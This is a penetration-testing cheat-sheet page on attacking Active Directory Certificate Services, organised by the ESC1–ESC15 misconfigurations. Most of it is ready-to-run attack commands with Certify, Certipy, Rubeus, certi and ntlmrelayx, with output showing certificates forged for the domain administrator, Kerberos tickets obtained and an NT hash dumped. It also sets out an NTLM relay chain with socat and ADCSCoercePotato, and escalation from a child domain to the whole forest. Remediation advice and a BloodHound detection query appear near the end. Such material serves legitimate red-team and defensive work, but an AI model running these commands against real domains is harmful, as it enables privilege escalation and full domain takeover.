AD CS

Last updated 23 days ago

AD CS

PKI ?

nxc ldap <ip> -u user -p pass -M adcs

ESC

Escalation

Definition

Enrolee can request cert for ANY user

ESC2

Any purpose or no EKU (potentially dangerous)

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

ESC4

Overly permissive ACLs on templates

ESC5

Poor access control on CA server, CA server computer object, etc.

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user

ESC7

Poor access control on roles on CA authority like "CA Administrator" and "Certificate Manager"

NTLM relay to HTTP enrollement endpoints

NXC

Vulnerable Template

nxc smb IP -u user -d domain.local -p password -M enum_ca

Masky

If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT

Tools

Locksmith

# Run all scans
Invoke-Locksmith -Scan All

Certify

Enumeration

AD CS in the target forest

Certify.exe cas

Templates

Certify.exe find

Vulnerable templates

Certify.exe find /vulnerable

Certi

$ certi.py list 'contoso.local/Han' -k -n --dc-ip 192.168.100.2 --vuln --enable | grep ESC3 -B 3
Name: User
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate
--
Name: Administrator
Schema Version: 1
Enroll Services: contoso-DC01-CA
Vulnerabilities: ESC3.2 - Use Agent Certificate

Certipy

Vulnerable template

# certipy find -u ca_operator -p NewPassword0xss0rz -dc-ip 10.10.11.41 -vulnerable -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'domain-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'domain-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'domain-DC01-CA'
[*] Saved BloodHound data to '20241126073356_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241126073356_Certipy.txt'
[*] Saved JSON output to '20241126073356_Certipy.json'

 # cat 20241126073356_Certipy.txt | grep ESC
      ESC9                              : 'DOMAIN.HTB\\operator ca' can enroll and template has no security extension
 
 # cat 20241126073356_Certipy.txt

PSPKIAudit

Only ESC1 to ESC8

Metasploit

ADCSKiller

Practice and explanation

ESC1

"VulnTemplate" has ENROLLEE_SUPPLIES_SUBJECT value for msPKI-Certificates-Name-Flag

Certify.exe find /enrolleeSuppliesSubject

"VulnTemplate" allows enrollment to RDPUsers group.

Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"VulnTemplate" /altname:administrator

Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:passw0rd /ptt

Linux - Certipy

# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl'

If Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template, Go back to the certipy find result and get the RSA Key Length. Append it to the command: -key-size

# certipy req -u 'BANKING$@retro.vl' -p 'P@ssw0rd' -dc-ip '10.10.118.214' -ca 'retro-DC-CA' -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'Administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

# certipy auth -pfx administrator.pfx 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389

ESC2

Find vulnerable templates

certipy find -u 'bspears' -p REDACTED -dc-ip 10.10.0.10 -vulnerable -enabled

Exploit

certipy-ad req -u 'bspears' -p 'REDACTED' \ 
-dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com' \ 
-ca 'foobar-CA' \ 
-template 'ESC2_User'-debug

certipy-ad req -u 'bspears' -p 'REDACTED' -dc-ip '10.10.0.10' \ 
-target 'dc01.foobar.com'  
-ca 'foobar-CA' \ 
-template 'User' \ 
-on-behalf-of 'example\administrator' \ 
-pfx bspears.pfx -debug

ESC3

Request an enrollement agent certificate and use it to request cert on behalf of ANY user

"VulnTemplateEnrollement-Agent" allows Domain users to enroll and has 'Certificate Request Agent' EKU

"VulnTemplateEnrollement-Users" has an Application Policy Issuance Requirement of Certificate Request Agent and has an EKU that allows for domain authentication

Escalation to DA

child.parent.local: child domain

parent.local: parent domain

Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Agent

Convert cert.pem to pfx and use it to request a cert on behalf on DA using "VulnTemplateEnrollement-Users"

openssl.exe pkcs12 -in C:\path\to\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3agent.pfx

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:child\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

Convert from cert.pem to pfx, request DA TGT and inject it

openssl.exe pkcs12 -in C:\path\to\DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\path\to\esc3user-DA.pfx

Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:passw0rd /ptt

Escalation to EA

Request a certif for Certificate Request Agent from "VulnTemplateEnrollement-Agent" template - see Escalation to DA
Convert cert.pem to pfx and use it to request a cert on behalf on EA using "VulnTemplateEnrollement-Users

Certify.exe request /ca:dc.parent.local\DC-CA /template:VulnTemplateEnrollement-Users /onbehalfof:parent.local\administrator /enrollcert:esc3agent.pfx /enrollcertpw:passw0rd

Request EA TGT and inject it

Rubeus.exe asktgt /user:parent.local\administrator /certificate:esc3user-EA.pfx /dc:dc.parent.local /password:passw0rd /ptt

ESC4

certipy template -u billy@foobar.com -p REDACTED -template ESC4Certificate_FOOBAR -dc-ip <DC_IP> -save-old

certipy req -u 'billy@foobar.com' -p 'REDACTED' -dc-ip '10.10.1.100' -target 'foobar-CA.foobar.com ' -ca 'foobar-CA' -template 'ESC4Certificate_FOOBAR' -upn 'DA_Dan@foobar.com'

certipy auth -pfx DA_Dan.pfx

Clean up

certipy template 
-u user@foobar.com \
-p REDACTED \
-template ESC4Certificate_FOOBAR \
-dc-ip <DC_IP> \
--configuration 'ESC4Certificate_FOOBAR.json'

ESC6

EDITF_ATTRIBUTESUBJECTNAME2 setting on CA - Request certs for ANY user from a template that allow enrollment to low-priv user

"Vuln-Integration" grants enrollment to RDPUsers group.

Request a certificate for DA (or EA) as a user1 (member of RDP group)

Certify.exe request /ca:dc.parent.local\DC-CA /template:"Vuln-Integration" /altname:administrator

Convert cert.pem to pfx and use it to request a TGT for DA (or EA)

Rubeus.exe asktgt /user:administrator /certificate:esc6.pfx /password:passw0rd /ptt

ESC8 - PetitPotam

NTLM relay to HTTP enrollement endpoints

ESC9

Certifried - CVE-2022-26923

ADCSCoercePotato

On the attacker system:

socat TCP-LISTEN:135,reuseaddr,fork TCP:<TARGET-IP>:9999

On a domain-joined system:

ADCSCoercePotato.exe -m <REMOTE-DCOM-SERVER/ADCS-SERVER> -k <IP-ADDRESS-SOCAT-REDIRECTOR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -c D99E6E74-FC88-11D0-B498-00A0C90312F3

Relay with ntlmrelayx.py to the ADCS Web enrollment Endpoint:

impacket-ntlmrelayx -t http://<ADCS-WEB-ENROLLMENT-IP/FQDN>/certsrv/certrqus.asp --adcs --template <TEMPALTE-NAME/machine> -smb2support

RemoteKrbRelay

RemoteKrbRelay.exe -adcs -template domaincontroller -target <FQDN-DC.DOMAIN.COM> -victim <FQDN-VICTIM.DOMAIN.COM> -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

CertPotato

KrbRelay-SMBServer

ESC14

ADCS ESC15 (EKUwu) - CVE-2024-49019

The TrustedSec team tested the CVE-2024-49019 vulnerability across multiple clients, finding that 10 out of 15 environments were at risk

Detection: Bloodhound query

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

Exploitation

From Child to Forest

Relay Attack on WinReg RPC Client

Remediation

The following security controls should be implemented to mitigate an ESC1 AD CS compromise:

Remove the Enrolee Supplies Subject flag. Do not allow users to provide their own SAN in the certificate signing request for templates configured for client authentication. Templates configured with the Enrolee Supplies Subject flag allow a user to provide their own SAN.
Restrict standard user object permissions on certificate templates. Standard user objects should not have write permissions on certificate templates. User objects with write permissions may be able to change enrolment permissions or configure additional settings to make the certificate template vulnerable.
Remove vulnerable AD CS CA configurations. Ensure that the CA is not configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. When configured, this allows a SAN to be provided on any certificate template.
Require CA Certificate Manager approval for certificate templates that allow the SAN to be supplied. This ensures certificate templates that require CA certificate manager approval are not issued automatically when requested; instead, they must be approved using certificate manager before the certificate is issued.
Remove EKUs that enable user authentication. This prevents malicious actors from exploiting the certificate to authenticate as other users.
Limit access to AD CS CA servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group and reduces the number of opportunities for malicious actors to gain access to CA servers.
Only use AD CS CA servers for AD CS and do not install any non-security-related services or applications. This reduces the attack surface of AD CS CA servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD CS CA server.
Encrypt and securely store backups of AD CS CA servers and limit access to only Backup Administrators. Backups of AD CS CA servers need to be afforded the same security as the actual AD CS CA servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD CS CA servers.
Centrally log and analyse AD CS CA server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to a CA server, this activity should be identified as soon as possible to respond and limit the impact.

Detection

ADCS Honeypot

Resources

PreviousLSASS secrets NextDPAPI

Last updated 23 days ago